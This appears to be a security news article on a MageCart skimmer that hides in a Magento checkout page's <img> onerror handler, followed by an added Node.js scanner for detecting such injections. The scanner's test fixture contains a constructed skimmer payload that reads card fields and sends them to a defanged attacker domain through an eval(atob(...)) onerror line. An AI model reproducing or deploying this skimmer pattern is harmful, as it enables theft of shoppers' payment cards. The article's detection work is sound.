
A new MageCart attack targeting Magento-powered eCommerce websites has been uncovered by researchers at Sucuri, revealing a method that hides a credit card skimmer inside an <img> tag and runs it from the tag's onerror handler. This lets the attackers exfiltrate payment data while the injection passes as an ordinary image element, a place where reviewers and signature-based scanners rarely look for executable code.
The attack was discovered when a client approached Sucuri, concerned that their website was infected with credit card skimming malware. According to the security analyst Kayleigh Martin, “Their website was running on Magento, a popular eCommerce content management system that skilled attackers often target to steal as many credit card numbers as possible.”
This particular attack relies on stealth. The malware injects malicious JavaScript inside an <img> tag, making it appear as a standard image element. “It does this by disguising malicious content inside an <img> tag, making it easy to overlook,” Martin explains.
To uncover the malware, analysts inspected the website’s checkout page and found an unusually long Base64-encoded string within an <img> tag. While Base64 encoding is often used for small embedded images, Sucuri’s investigation raised red flags: “What makes this even more suspicious is its location—on the checkout page and nowhere else on the site.”
The <img> tag also includes an onerror event handler, which is normally used to react to a failed image load, for example by swapping in a fallback image. Here the attackers repurpose it to execute their JavaScript: because the handler fires as soon as the image fails to load, the payload runs without any <script> element being present on the page. “The onerror event is hijacked to execute JavaScript instead of just handling the error,” the report states.
This is an effective evasion because an inline event handler runs JavaScript exactly as a <script> element would, yet an <img> tag is not where most reviewers or security tools expect to find code, so it is often skipped in scans. A Content Security Policy that does not allow 'unsafe-inline' script would block inline handlers such as onerror entirely, which is one reason such a policy is worth deploying on checkout pages.
Once the hidden JavaScript executes, the malware:
- Checks whether the user is on the checkout page and ensures it hasn’t already run.
- Waits for the user to submit payment details.
- Activates a function called magictrick(), which steals credit card data.
According to Sucuri, “This function is crucial, as it collects and sends sensitive user data to a remote server.”
The malware also dynamically injects its own form into the checkout page, so that the victim types card details into fields the skimmer controls. This form collects:
- Card Number
- Expiration Date
- CVV (Security Code)
The script also strips non-numeric characters from the captured values, so only clean digit strings are kept and malformed input does not stand out.
Once the card details are captured, the malware encodes the data and sends it to wellfacing[.]com, a malicious domain controlled by the attackers. The stolen credit card information is stored and likely sold on the dark web for fraudulent transactions and identity theft.
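The following scanner is an added example, not Sucuri's code or anything taken from the infected site. It puts the two observations above into a check a practitioner can run over raw checkout HTML: it finds every <img> tag, flags onerror handlers that decode or evaluate a payload or that carry an unusually long Base64 blob, decodes that blob, and looks for the skimmer traits the report describes (a checkout-page gate, a function named magictrick, card fields, digit-only filtering, an exfiltration call, and the wellfacing domain). The Base64 length threshold, the indicator patterns, the sample checkout page and the sample payload (which only imitates the described behaviour, with the C2 URL defanged) are all constructed assumptions for the demonstration. It runs on Node.js with no dependencies.

```javascript
// Added example (not Sucuri's code): scan checkout HTML for <img> tags whose
// onerror handler executes JavaScript or decodes a long Base64 payload, then
// decode that payload and look for the skimmer traits the report describes.
// Node.js, no dependencies. Thresholds and indicator patterns are assumptions.

const SUSPICIOUS_B64_LEN = 200; // assumption: tune to the longest legitimate inline image on the site

// Calls that turn a string into running code inside an inline handler.
const EVAL_PATTERN = /\b(eval|Function|atob|setTimeout|setInterval|document\.write)\s*\(/;

// Traits of the decoded payload, modelled on the behaviour described in the report.
const SKIMMER_INDICATORS = {
  checkoutGate: /checkout/i,
  magictrick:   /magictrick/i,
  cardFields:   /cc_number|card_?number|cvv|cvc|exp(iry|ir)?/i,
  digitsOnly:   /replace\(\s*\/\\D\/g/,            // strips non-numeric characters
  exfil:        /new Image\(\)|XMLHttpRequest|fetch\(|sendBeacon|btoa\(/,
  c2Domain:     /wellfacing/i,                      // the domain named in the report
};

function extractImgTags(html) {
  return html.match(/<img\b[^>]*>/gi) || [];
}

// Returns the value of an attribute (double-, single- or un-quoted), or ''.
function getAttr(tag, name) {
  const re = new RegExp(`\\b${name}\\s*=\\s*(?:"([^"]*)"|'([^']*)'|([^\\s>]+))`, 'i');
  const m = tag.match(re);
  return m ? (m[1] ?? m[2] ?? m[3]) : '';
}

function findBase64Blobs(text, minLen) {
  return (text.match(/[A-Za-z0-9+\/]{20,}={0,2}/g) || []).filter((b) => b.length >= minLen);
}

function decodeBase64(b64) {
  return Buffer.from(b64, 'base64').toString('utf8');
}

function analyzeImgTag(tag) {
  const onerror = getAttr(tag, 'onerror');
  const src = getAttr(tag, 'src');
  const handlerBlobs = findBase64Blobs(onerror, SUSPICIOUS_B64_LEN);
  const allBlobs = findBase64Blobs(`${onerror} ${src}`, SUSPICIOUS_B64_LEN);
  const decoded = allBlobs.map(decodeBase64).join('\n');
  const haystack = `${onerror}\n${decoded}`;
  const indicators = Object.entries(SKIMMER_INDICATORS)
    .filter(([, re]) => re.test(haystack))
    .map(([name]) => name);
  const evalsPayload = EVAL_PATTERN.test(onerror);
  return {
    tag: tag.length > 60 ? `${tag.slice(0, 60)}...` : tag,
    hasOnerror: onerror.length > 0,      // any inline handler runs JavaScript
    evalsPayload,
    base64Length: allBlobs.reduce((n, b) => Math.max(n, b.length), 0),
    indicators,
    // A long data: image with no handler is normal; a handler that evaluates
    // code, a long blob inside a handler, or several skimmer traits are not.
    suspicious: evalsPayload || handlerBlobs.length > 0 || indicators.length >= 2,
  };
}

function scanPage(html) {
  return extractImgTags(html).map(analyzeImgTag).filter((r) => r.suspicious);
}

// Constructed sample payload imitating the described behaviour (C2 URL defanged).
const SAMPLE_PAYLOAD = `
if (location.pathname.indexOf('checkout') !== -1 && !window.__ran) {
  window.__ran = true;
  function magictrick() {
    var cc  = document.getElementById('cc_number').value.replace(/\\D/g, '');
    var exp = document.getElementById('cc_exp').value.replace(/\\D/g, '');
    var cvv = document.getElementById('cc_cvv').value.replace(/\\D/g, '');
    new Image().src = 'https://wellfacing[.]com/collect?d=' + btoa(cc + '|' + exp + '|' + cvv);
  }
  document.getElementById('checkout').addEventListener('submit', magictrick);
}`;
const SAMPLE_B64 = Buffer.from(SAMPLE_PAYLOAD).toString('base64');
// Stand-in for a legitimate (long) inline image: 300 bytes of 0x89, Base64-encoded.
const FAKE_IMAGE_B64 = Buffer.alloc(300, 0x89).toString('base64');

// Constructed checkout page: two benign images, one benign onerror fallback, one skimmer.
const SAMPLE_CHECKOUT_HTML = `
<html><body>
<img src="/media/logo.png" alt="Store logo">
<img src="data:image/png;base64,${FAKE_IMAGE_B64}" alt="inline image">
<img src="/media/badge.png" onerror="this.src='/media/fallback.png'">
<form id="checkout"><input id="cc_number"><input id="cc_exp"><input id="cc_cvv"></form>
<img src="x" onerror="eval(atob('${SAMPLE_B64}'))">
</body></html>`;

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(scanPage(SAMPLE_CHECKOUT_HTML), null, 2));
}
```

Run against the constructed page, only the last <img> is reported: its handler evaluates a decoded payload, the blob is far longer than the threshold, and all six indicators match. The long data: image and the benign onerror fallback are left alone, which is the distinction a checkout-page scan has to make in practice. Against a real store, feed it the rendered checkout HTML (fetched server-side or saved from a browser) and review anything flagged by hand; the indicator list is a starting point, not a signature.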